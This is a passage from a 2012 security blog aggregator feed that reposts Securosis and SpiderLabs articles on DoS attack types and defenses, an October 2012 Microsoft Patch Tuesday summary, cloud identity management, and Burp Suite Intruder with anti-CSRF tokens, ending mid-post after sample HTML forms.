Ultimately your choice of network-based DoS mitigations will involves trade-offs. It is never good to over-generalize, but most organizations will be best suited by a hybrid approach, involving both a customer premise-based appliance and a contracting with a CDN or anti-DoS service provider to handle severe volumetric attacks. It is simply not cost-effective to run all your traffic through a scrubbing center constantly, and many DoS attacks target the application layer – demanding use of a customer premise device anyway.<br />
<br />
In terms of service provider defense, many organizations can (and should) get started with a CDN. The CDN may be more attractive initially for its performance benefits, with anti-DoS and WAF capabilities as nice extras. Until you are attacked – at which point, depending on the nature of the attack, the CDN may save your proverbial bacon. If you are battling sophisticated attackers, or have a complicated and/or enterprise class infrastructure, you are likely looking at contracting with a dedicated anti-DoS service provider. Again, this will usually be a retainer-based relationship which gives you the ability to route your traffic through the scrubbing center when necessary – paying when you are under attack and sending them traffic.<br />
<br />
All this assumes your sites reside within your data center. Cloud computing fundamentally alters the calculations, requiring different capabilities and architectures. If your apps reside in the cloud you don’t <em>have</em> a customer premise where you can install devices, so you would instead consider either virtual instance, routing traffic through your site before it hits the cloud, or using a CDN for all inbound traffic. You could also architect your cloud infrastructure to provision more instances as necessary to handle traffic, but it is easy to convert a DoS attack into an economic attack as you pay to scale up in order to handle bogus traffic. There are no clear answers yet – it is still very early in the evolution of cloud computing – but it is something to factor in as your application architects keep talking about this <em>cloud thingy</em>.<br />
<br />
Next we will address the <em>application</em> side of the DoS equation, before we wrap up with the DoS Defense process.<br />
<br />
- Mike Rothman<br />
(0) <a href="https://securosis.com/blog/defending-against-dos-attacks-defense-part-1-the-network">Comments</a>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-6117988935954155782012-10-09T12:15:00.001-07:002012-10-09T12:15:06.491-07:00Microsoft Patch Tuesday, October 2012 – Legend of Zelda Edition<a href="http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/GstPqdZWO48/microsoft-patch-tuesday-october-2012-legend-of-zelda.html">Microsoft Patch Tuesday, October 2012 – Legend of Zelda Edition</a>: <br />
<div>Hope you enjoyed last months light patch Tuesday with only<br />
two bulletins as this month we are right back at it with seven bulletins<br />
covering everything from Elevation of Privilege, Denial of Service and Remote<br />
Code Execution. There is only one critical update this month but there is also<br />
the enforcement of 1024 bit digital certificates. Probably the most interesting<br />
patch this month involves Lync, Microsoft’s enterprise messaging system, if<br />
only for the reason that every time I read Lync I think Link, as in the hero of<br />
Nintendo’s Legend of Zelda which I spent way too much time playing back in the<br />
eighties.<br />
Much like Link needs to get keys to open doors in Hyrule<br />
Microsoft products will often use certificates to allow communication between<br />
products. As of today Microsoft products will reject any certificates with RSA<br />
keys of less than 1024 bits. Microsoft<br />
has made an optional patch available for the last two months to enforce this<br />
rule but now it is no longer optional.<br />
Even if you are not using 512bit keys this is an excellent opportunity<br />
to update all your keys to 1024 bits or even more.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b23ac970b-pi" style="float: right;"><img alt="KeyLoZ" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b23ac970b-800wi" style="margin: 0px 0px 5px 5px;" title="KeyLoZ" /></a><br />
<br />
<strong><br />
</strong><br />
<br />
MS12-064 (KB 2742319)<br />
<strong><span style="color: red;">CRITICAL</span></strong><br />
<em>Remote Code Execution<br />
in Microsoft Word</em><br />
CVE-2012-0182<br />
CVE-2012-2528<br />
A specially crafted RTF file could allow an attacker to take<br />
complete control of a system to install their own programs, delete data or even<br />
create new accounts. (Sounds like something a WallMaster would do.) The vulnerability is present in most versions<br />
of Microsoft Word 2003, 2007, 2010 and even Sharepoint Server 2010 SP1 and is<br />
caused by how Word handles memory when parsing certain files. This one can be a<br />
little tricky because Microsoft Word is set as the default mail reader in<br />
Outlook 2007 and 2010, which means that an attacker could leverage email as the<br />
attack vector to get you to open the specially crafted RTF file. This<br />
vulnerability has been hidden away in a dungeon (probably the Manji Dungeon)<br />
and has not yet been seen in the wild.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b2429970b-pi" style="float: right;"><img alt="WallmasterLoZ" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b2429970b-800wi" style="margin: 0px 0px 5px 5px;" title="WallmasterLoZ" /></a><br />
<br />
<strong>MS12-065 (KB 27546070)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Remote Code Execution<br />
in Microsoft Works</em><br />
CVE-2012-2550<br />
The last time I used Microsoft Works was version 2.0 on my<br />
Mac SE so I was surprised to learn that the current version is 9.0 and is still<br />
a supported and even a shipping product. Works 9.0 is still available at retail<br />
but is mostly used by OEMs to include with systems. If you are using Works 9.0<br />
you will want to pay attention to this one especially if you try to open<br />
Microsoft Word files with your version of Works. When Works attempts to convert a Word file it<br />
can potentially cause system memory corruption that could allow an attacker to<br />
execute arbitrary code. If you are using an older version of Microsoft Works<br />
you should really think about upgrading. Microsoft doesn’t mention if the<br />
vulnerability exists in older versions or not since they are no longer<br />
supported, so to be safe you will want to upgrade.<br />
<br />
<strong>MS12-066 (KB 2741517)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Elevation of Privilege<br />
in HTML Sanitation</em><br />
CVE-2012-2520<br />
<em>“But<br />
wait! All was not lost. A young lad appeared. He skillfully drove off Ganon’s<br />
henchmen and saved Impa from a fate worse than death. His name was Link.”<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40ef5d4970d-pi" style="float: right;"><img alt="Link_NES" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40ef5d4970d-800wi" style="margin: 0px 0px 5px 5px;" title="Link_NES" /></a></em><br />
OK, this one affects more than just Lync but also Infopath,<br />
Communicator, SharePoint, Groove and Office Web Apps. However as soon as I read Lync I immediately<br />
thought of our intrepid hero and his quest to save the lovely princess<br />
Zelda. But instead of being hunted by<br />
the evil forces of Ganon this Lync is hunted by poorly sanitized HTML strings.<br />
The bad strings could allow cross-site scripting attacks that could run scripts<br />
in the context of the logged-on user. If<br />
you try to get the full Lync update through Automatic Update you won’t find it.<br />
The update for Lync 2010 Attendee (user level install) has to be handled<br />
through a Lync session so the update is only available in the Microsoft<br />
Download Center. This one has escaped<br />
the dungeon and has been seen on a limited basis in the wild. (Just hiding<br />
under the sand like a Peahat waiting to get you.)<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b1adf970b-pi" style="float: right;"><img alt="PeahatSprite" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b1adf970b-800wi" style="margin: 0px 0px 5px 5px;" title="PeahatSprite" /></a><br />
<br />
<strong>MS12-067 (KB 2742321)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Remote Code Execution<br />
in Sharepoint FAST Search Server 2010</em><br />
CVE-2012-1766<br />
You only need to worry about this patch if you have the<br />
Advanced Filter Pack enabled on your FAST Search Server 2010 for SharePoint,<br />
it’s disabled by default. Exploitation<br />
of this vulnerability could allow an attacker to run arbitrary code in the<br />
context of a user account with a restricted token (Orange Rupee?). The flaw is<br />
actually in the Oracle Outside-In libraries licensed from by Microsoft. This is<br />
at least the second recent vulnerability we have seen in these libraries. While<br />
this one has not yet been seen in the wild Microsoft thinks that code to<br />
exploit this vulnerability is likely to exist within the next thirty days.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40edf32970d-pi" style="float: right;"><img alt="OrangeRupee" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40edf32970d-800wi" style="margin: 0px 0px 5px 5px;" title="OrangeRupee" /></a> <br />
<br />
<strong>MS12-068 (KB 2724197)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Elevation of Privilege<br />
in Windows Kernel</em><br />
CVE-2012-2529<br />
I hate reading “all supported releases of Microsoft<br />
Windows”, it sends shivers up my spine like a Stalfos. However, this statement was<br />
closely followed by “except Windows 8 and Windows Server 2012”, which isn’t<br />
much consolation, but I’ll take it. This is a classic elevation of privilege<br />
requiring an attacker to already have access to a system either through<br />
legitimate credentials or some other vulnerability. Once inside an attacker could use this<br />
vulnerability to gain administrator level access.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40ef394970d-pi" style="float: right;"><img alt="LoZ_Stalfos_gray" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee40ef394970d-800wi" style="margin: 0px 0px 5px 5px;" title="LoZ_Stalfos_gray" /></a><br />
<br />
<strong>MS12-069 (KB 2743555)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Denial of Service in<br />
Kerberos</em><br />
CVE-2012-2551<br />
Unlike MS12-068 that affects just about everything MS12-069 is<br />
<em>only</em> found in Windows 7 and Server<br />
2008 R2. A specially crafted session request to the Kerberos server could<br />
result in a denial of service. If you have a properly configured firewall in<br />
place it will help protect your network from external attacks, sort of like<br />
Link’s shield protects against Tektites. Of course that won’t do much good if<br />
the attacker is already inside your network.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b2f0a970b-pi" style="float: right;"><img alt="Tektite_LoZOrange" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c326b2f0a970b-800wi" style="margin: 0px 0px 5px 5px;" title="Tektite_LoZOrange" /></a><br />
<br />
<strong>MS12-070 (KB 2754849)</strong><br />
<strong><span style="color: #ff7f00;">IMPORTANT</span></strong><br />
<em>Elevation of Privilege<br />
in SQL Server</em><br />
CVE-2012-2552<br />
If you are running the SQL Server Reporting Service then you<br />
have a problem validating input parameters which if exploited could cause an<br />
elevation of privilege. The XSS filter in Internet Explorer 8, 9, and 10 can<br />
protect users against this attack <em>if </em>it<br />
is enable in the Intranet Zone, which is not the default. You can enable it by<br />
going to Internet Options -> Security Settings -> Intranet Zone -> Custom Level -> Enable XSS Filter or just apply the patch offered through Automatic Updates. If<br />
you decide to do neither and a user clicks on a specially crafted link in email<br />
or browses to a specially crafted webpage, well, game over.<br />
<br />
<div style="text-align: center;"><em>“Can<br />
Link really destroy Ganon and save princess Zelda?</em></div><div style="text-align: center;"><em>"Only<br />
your skill can answer that question. Good luck. Use the Triforce wisely."</em></div><a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c998314970c-pi" style="display: inline;"><img alt="240px-Triforce_Logo" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c998314970c-800wi" style="display: block; margin-left: auto; margin-right: auto;" title="240px-Triforce_Logo" /></a><br />
<br />
<br />
<div><a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=GstPqdZWO48:VqjvpRRr5J4:yIl2AUoC8zA"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=yIl2AUoC8zA" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=GstPqdZWO48:VqjvpRRr5J4:qj6IDK7rITs"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=qj6IDK7rITs" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=GstPqdZWO48:VqjvpRRr5J4:V_sGLiPBpWU"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?i=GstPqdZWO48:VqjvpRRr5J4:V_sGLiPBpWU" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=GstPqdZWO48:VqjvpRRr5J4:gIN9vFwOqvQ"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?i=GstPqdZWO48:VqjvpRRr5J4:gIN9vFwOqvQ" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=GstPqdZWO48:VqjvpRRr5J4:TzevzKxY174"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=TzevzKxY174" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=GstPqdZWO48:VqjvpRRr5J4:l6gmwiTKsz0"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=l6gmwiTKsz0" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=GstPqdZWO48:VqjvpRRr5J4:F7zBnMyn0Lo"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?i=GstPqdZWO48:VqjvpRRr5J4:F7zBnMyn0Lo" /></a></div><img height="1" src="http://feeds.feedburner.com/~r/SpiderlabsAnterior/~4/GstPqdZWO48" width="1" /></div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-55660066506546872122012-10-05T13:58:00.001-07:002012-10-05T13:58:26.329-07:00Defending Against DoS Attacks: The Attacks<a href="https://securosis.com/blog/defending-against-dos-attacks-the-attacks">Defending Against DoS Attacks: The Attacks</a>: <br />
<a href="https://securosis.com/blog/defending-against-denial-of-service-dos-attacks-new-blog-series">Our first post</a> built a case for considering availability as an aspect of security context, rather than only confidentiality and integrity. This has been driven by Denial of Service (DoS) attacks, which are used by attackers in many different ways, including extortion (using the threat of an attack), obfuscation (to hide exfiltration), hacktivism (to draw attention to a particular cause), or even friendly fire (when a promotion goes a little too well).<br />
<br />
Understanding the adversary and their motivation is one part of the puzzle. Now let’s look at the types of DoS attacks you may face – attackers have many arrows in their quivers, and use them all depending on their objectives and targets.<br />
<br />
<h2>Flooding the Pipes</h2><br />
The first kind of Denial of Service attack is really a blunt force object. It’s basically about trying to oversubscribe the bandwidth and computing resources of network (and increasingly server) devices to impact resource availability. These attacks aren’t very sophisticated, but as evidenced by the ongoing popularity of volume-based attacks, fairly effective effective. These tactics have been in use since before the Internet bubble, leveraging largely the same approach. But they have gotten easier with bots to do the heavy lifting. Of course, this kind of blasting must be done somewhat carefully to maintain the usefulness of the bot, so bot masters have developed sophisticated approaches to ensure their bots avoid ISPs penalty boxes. So you will see limited bursts of traffic from each bot and a bunch of IP address spoofing to make it harder to track down where the traffic is coming from, but even short bursts from 100,000+ bots can flood a pipe.<br />
<br />
Quite a few specific techniques have been developed for volumetric attacks, but most look like some kind of <em>flood</em>. In a network context, the attackers focus on overfilling the pipes. Floods target specific protocols (SYN, ICMP, UDP, etc.), and work by sending requests to a target using the chosen protocol, but not acknowledging the response. Enough of these outstanding requests limit the target’s ability to communicate. But attackers need to stay ahead of Moore’s Law, because targets’ ability to handle floods has improved with processing power. So network-based attacks may include encrypted traffic, forcing the target to devote additional computational resources to process massive amounts of SSL traffic. Given the resource-intensive nature of encryption, this type of attack can melt firewalls and even IPS devices unless they are configured specifically for large-scale SSL support. We also see some malformed protocol attacks, but these aren’t as effective nowadays, as even unsophisticated network security perimeter devices drop bad packets at wire speed.<br />
<br />
These volume-based attacks are climbing the stack as well, targeting web servers by actually completing connection requests and then making simple GET request and resetting the connection over and over again, with approximately the same impact as a volumetric attack – over-consumption of resources effectively knocking down servers. These attacks may also include a large payload to further consume bandwidth. The now famous <a href="http://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon">Low Orbit Ion Cannon</a>, a favorite tool of the hacktivist crowd, has undertaken a similar evolution, first targeting network resources and proceeding to now target web servers as well. It gets even better – these attacks can be <em>magnified</em> to increase their impact by simultaneously spoofing the target’s IP address and requesting sessions from thousands of <em>other</em> sites, which then bury the target in a deluge of misdirected replies, further consuming bandwidth and resources.<br />
<br />
Fortunately defending against these network-based tactics isn’t overly complicated, as we will discuss in the next post, but without a sufficiently large network device at the perimeter to block these attacks or an upstream service provider/traffic scrubber to dump offending traffic, devices fall over in short order.<br />
<br />
<h2>Overwhelming the Application</h2><br />
But attackers don’t only attack the network – they increasingly attack the applications as well, following the rest of attackers up the stack. Your typical <em>n</em>-tier web application will have some termination point (usually a web server), an application server to handle application logic, and then a database to store the data. Attackers can target all tiers of the stack to impact application availability. So let’s dig into each layer to see how these attacks work.<br />
<br />
The termination point is usually the first target in application DoS attacks. They started with simple GET floods as described above, but quickly evolved to additional attack vectors. The best known application DoS attack is probably <a href="http://ha.ckers.org/slowloris/">RSnake’s Slowloris</a>, which consumes web server resources by sending partial HTTP requests, effectively opening connections and then leaving the sessions open by sending additional headers at regular intervals. This approach is far more efficient than the GET flood, requiring only hundreds of requests at regular intervals rather than constant thousands, and only requires one device to knock down a large site. These application attacks have evolved over time and now send complete HTTP requests to evade IDS and WAF devices looking for incomplete HTTP requests, but they tamper with payloads to confuse applications and consume resources. As defenders learn the attack vectors and deploy defenses, attackers evolve their attacks. The cycle continues.<br />
<br />
Web server based attacks can also target weaknesses in the web server platform. For example the <a href="https://issues.apache.org/bugzilla/show_bug.cgi?id=51714">Apache Killer attack</a> sends a malformed HTTP range request to take advantage of an Apache vulnerability. The Apache folks quickly patched the code to address this issue, but it shows how attackers target weaknesses in the underlying application stack to knock the server over. And of course unpatched Apache servers are still vulnerable today at many organizations. Similarly, the RefRef attack leverages SQL injection to inject a rogue <code>.js</code> file onto a server, which then hammers a backend database into submission with seemingly legitimate traffic originating from an application server. Again, application and database server patches are available for the underlying infrastructure, but vulnerability remains if either patch is missing.<br />
<br />
Attackers can also target legitimate application functionality. One example of such an attack targets the search capability within a web site. If an attacker scripts a series of overly broad searches, the application can waste a large amount of time polling the database and presenting results. Likewise, attackers can game shopping carts by opening many shopping sessions, adding thousands of items to each cart, constantly refreshing the carts, and then abandoning them. Unless the application is architected to handle these use cases efficiently, such attacks accomplish their goals. For most sites, failing to return search results or track shopping carts is a complete failure with severe business ramifications. Which is the success scenario for a DoS attack.<br />
<br />
The advantage to application attacks is their ability to evade many of the defenses put in place to stop DoS. Our Managing WAF series discussed <a href="https://securosis.com/blog/pragmatic-waf-management-securing-the-waf">WAF evasion</a>, and IDS evasion is a similarly mature and effective attack discipline. These network security devices are little more than speed bumps to knowledgeable attackers, so developers need to ensure their applications can deal with the attacks. That’s another point we made in the <a href="https://securosis.com/blog/pragmatic-waf-management-application-lifecycle-integration">Application Lifecycle Integration</a> post.<br />
<br />
<h2>Targeting the Defenses</h2><br />
Attackers can also perform some reconnaissance to learn about targets’ defenses in order to game them. For instance, financial institutions tend to do a lot of security monitoring due to severe regulatory oversight requirements, so if an attacker constantly loads web pages or enters dummy transactions they may manage to overwhelm the monitoring system. Does this impact application availability? Probably not, but it at least hampers the security team’s efforts to figure out what’s going on, providing an opportunity for another attack to exfiltrate data undetected.<br />
<br />
<h2>Impacting the Wallet</h2><br />
An emerging DoS attack works economically even when it does not impair service availability. The so-called EDoS (economic denial of service) attack involves a focused attempt to increase the cost of the target’s technology infrastructure. In a network attack, bad guys take advantage of excessive bandwidth charges. So even if a target successfully defends against an attack, their bandwidth to mitigate a multi-gigabyte attack could cost as much or more than an outage. Similarly, if a target leverages public cloud infrastructure to auto-provision new instances as utilization thresholds are met, an application attack can have a substantial financial cost without ever threatening availability. One potential endgame for cloud-based attacks is reaching the target’s credit limit with their cloud provider, triggering an outage when the provider caps their usage.<br />
<br />
Attackers can mix and match a variety of different DoS attacks to achieve their goal of adversely impacting availability of an application or service. Next we will move on to tactics and approaches to defend against DoS, starting with network attacks.<br />
<br />
- Mike Rothman<br />
(2) <a href="https://securosis.com/blog/defending-against-dos-attacks-the-attacks">Comments</a>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-6707281072295191112012-10-05T10:33:00.001-07:002012-10-05T10:33:45.528-07:00New Series: Understanding and Selecting Identity Management for Cloud Services<a href="https://securosis.com/blog/new-series-understanding-and-selecting-identity-management-for-cloud-servic">New Series: Understanding and Selecting Identity Management for Cloud Services</a>: <p>Adrian and Gunnar here, kicking off a new series on Identity Management for Cloud Services.</p><br />
<p>We have been hearing about Federated Identity and Single Sign-On services for the last decade, but demand for these features has only fully blossomed in the last few years, as companies have needed to integrate their internal identity management systems. The meanings of these terms has been actively evolving, under the influence of cloud computing. The ability to manage what resources your users can access <em>outside</em> your corporate network – on third party systems outside your control – is not just a simple change in deployment models; but a fundamental shift in how we handle authentication, authorization, and provisioning. Enterprises want to extend capabilities to their users of low-cost cloud service providers – while maintaining security, policy management, and compliance functions. We want to illuminate these changes in approach and technology. And if you have not been keeping up to date with these changes in the IAM market, you will likely need to unlearn what you know. We are not talking about making your old Active Directory accessible to internal <em>and</em> external users, or running LDAP in your Amazon EC2 constellation. We are talking about the fusion of multiple identity and access management capabilities – possibly across multiple cloud services. We are gaining the ability to authorize users across multiple services, without distributing credentials to each and every service provider.</p><br />
<p>Cloud services – be they SaaS, PaaS, or IaaS – are not just new environments in which to deploy existing IAM tools. They fundamentally shift existing IAM concepts. It’s not just the way IT resources are deployed in the cloud, or the way consumers want to interact with those resources, which have changed, but those changes are driven by economic models of efficiency and scale. For example enterprise IAM is largely about provisioning users <em>and</em> resources into a common directory, say Active Directory or RACF, where the IAM tool enforces access policy. The cloud changes this model to a chain of responsibility, so a single IAM instance cannot completely mediate access policy. A cloud IAM instance has a shared responsibility in – as an example – assertion <em>or</em> validation of identity. Carving up this set of shared access policy responsibilities is a game changer for the enterprise.</p><br />
<p>We need to rethink how we manage trust and identities in order to take advantage of elastic, on-demand, and widely available web services for heterogenous clients. Right now, behind the scenes, new approaches to identity and access management are being deployed – often seamlessly into cloud services we already use. They reduce the risk and complexity of mapping identity to public or semi-public infrastructure, while remaining flexible enough to take full advantage of <em>multiple</em> cloud service and deployment models.</p><br />
<p>Our goal for this series is to illustrate current trends and technologies that support cloud identity, describe the features available <em>today,</em> and help you navigate through the existing choices. The series will cover:</p><br />
<ul><li><strong>The Problem Space:</strong> We will introduce the issues that are driving cloud identity – from fully outsourced, hybrid, and proxy cloud services and deployment models. We will discuss how the cloud model is different than traditional in-house IAM, and discuss issues raised by the loss of control and visibility into cloud provider environments. We will consider the goals of IAM services for the cloud – drilling into topics including identity propagation, federation, and roles and responsibilities (around authentication, authorization, provisioning, and auditing). We will wrap up with the security goals we must achieve, and how compliance and risk influence decisions.</li>
<li><strong>The Cloud Providers:</strong> For each of the cloud service models (SaaS, PaaS, and IaaS) we will delve into the IAM services built into the infrastructure. We will profile IAM offerings from some of the leading <em>independent</em> cloud identity vendors for each of the service models – covering what they offer and how their features are leveraged or integrated. We will illustrate these capabilities with a simple chart that shows what each provides, highlighting the conceptual model each vendor embraces to supply identity services. We will talk about what you will be responsible for as a customer, in terms of integration and management. This will include some of the deficiencies of these services, as well as areas to consider augmenting.</li>
<li><strong>Use Cases:</strong> We will discuss three of the principal use cases we see today, as organizations move existing applications to the cloud and develop new cloud services. We will cover extending existing IAM systems to cover external SaaS services, developing IAM for new applications deployed on IaaS/PaaS, and adopting Identity as a Service for fully external IAM.</li>
<li><strong>Architecture and Design:</strong> We will start by describing key concepts, including consumer/service patterns, roles, assertions, tokens, identity providers, relying party applications, and trust. We will discuss the available technologies fors the heavy lifting (such as SAML, XACML, and SCIM) and discuss the problems they are designed to solve. We will finish with an outline of the different architectural models that will frame how you implement cloud identity services, including the integration patterns and tools that support each model.</li>
<li><strong>Implementation Roadmap:</strong> IAM projects are complex, encompass most IT infrastructure, and may take years to implement. Trying to do everything at once is a recipe for failure. This portion of our discussion will help ensure you don’t bite off more than you can chew. We will discuss how to select an architectural model that meets your requirements, based on the cloud service and deployment models you selected. Then we will create different implementation roadmaps depending on your project goals and critical business requirements.</li>
<li><strong>Buyer’s Guide:</strong> We will close by examining key decision criteria to help select a platform. We will provide questions to determine with vendors offer solutions that support your architectural model and criteria to measure the appropriateness of a vendor solution against your design goals. We will also help walk you through the evaluation process.</li>
</ul><br />
<p>As always, we encourage you to ask questions and chime in with comments and suggestions. The community helps make our research better, and we encourage <em>your</em> participation.</p><br />
<p>Next: the problems addressed by cloud identity services.</p><br />
- Adrian Lane<br />
(1) <a href="https://securosis.com/blog/new-series-understanding-and-selecting-identity-management-for-cloud-servic">Comments</a>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-43221717969695308082012-10-05T05:41:00.001-07:002012-10-05T05:41:15.907-07:00Adding Anti-CSRF Support to Burp Suite Intruder<a href="http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/FlD9q38Wr94/adding-anti-csrf-support-to-burp-suite-intruder.html">Adding Anti-CSRF Support to Burp Suite Intruder</a>: <br />
<div>In the web application penetration testing industry, <a href="http://www.portswigger.net/burp/" title="Burp Suite">Burp Suite</a> is considered a must-have tool – it includes an intercepting proxy, both active and passive web vulnerability scanners, crawler, session ID analysis tools and various other useful features, all under a single application. One of Burp's best features is the <a href="http://www.portswigger.net/burp/help/intruder.html" title="Burp Suite Intruder">Intruder</a>, a tool which allows the tester to provide a list of values which should be sent to the application as parameter values. By providing values which trigger SQL errors or inject Javascript into the resulting page, one can easily determine if and how the application is doing filtering on the parameters, and whether it is vulnerable to a given issue.<br />
<br />
<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c5ae680970c-pi" style="display: inline;"><img alt="Intruder" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c5ae680970c-800wi" title="Intruder" /></a><br />
Burp's Intruder works perfectly when the application responds to those requests as if they came from the user. The screenshot above shows the submission of the following HTML form:<br />
<pre style="background: #ffffff; color: black;"><span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">form</span><span style="color: #274796;"> </span><span style="color: #074726;">action</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"/CSRFGuardTestAppVulnerable/HelloWorld"</span><span style="color: #274796;"> </span>
<span style="color: #074726;">method</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"POST"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"first"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"text"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"SpiderLabs"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"name"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"></</span><span style="color: maroon; font-weight: bold;">form</span><span style="color: #a65700;">></span>
</pre>However, modern application frameworks are adding support for Anti-CSRF (<a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" title="OWASP Cross-Site Request Forgery reference">Cross-Site Request Forgery</a>) techniques, which protect the application from forged requests such as those Burp uses. The most commonly implemented prevention measure is the <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern" title="Synchronizer Token Pattern">Synchronizer Token Pattern</a>, which adds a parameter with a random value to all forms generated by the application for a given user session, and validates this token when the form is submitted. For example:<br />
<pre style="background: #ffffff; color: black;"><span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">form</span><span style="color: #274796;"> </span><span style="color: #074726;">action</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"/CSRFGuardTestApp/HelloWorld"</span>
<span style="color: #274796;"> </span><span style="color: #074726;">method</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"POST"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"first"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"text"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"SpiderLabs"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"name"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"hidden"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"Z0XN-1FRF-975E-GB9F-GGQM-L2RC-04H1-GKHQ"</span>
<span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"OWASP_CSRFTOKEN"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"></</span><span style="color: maroon; font-weight: bold;">form</span><span style="color: #a65700;">></span>
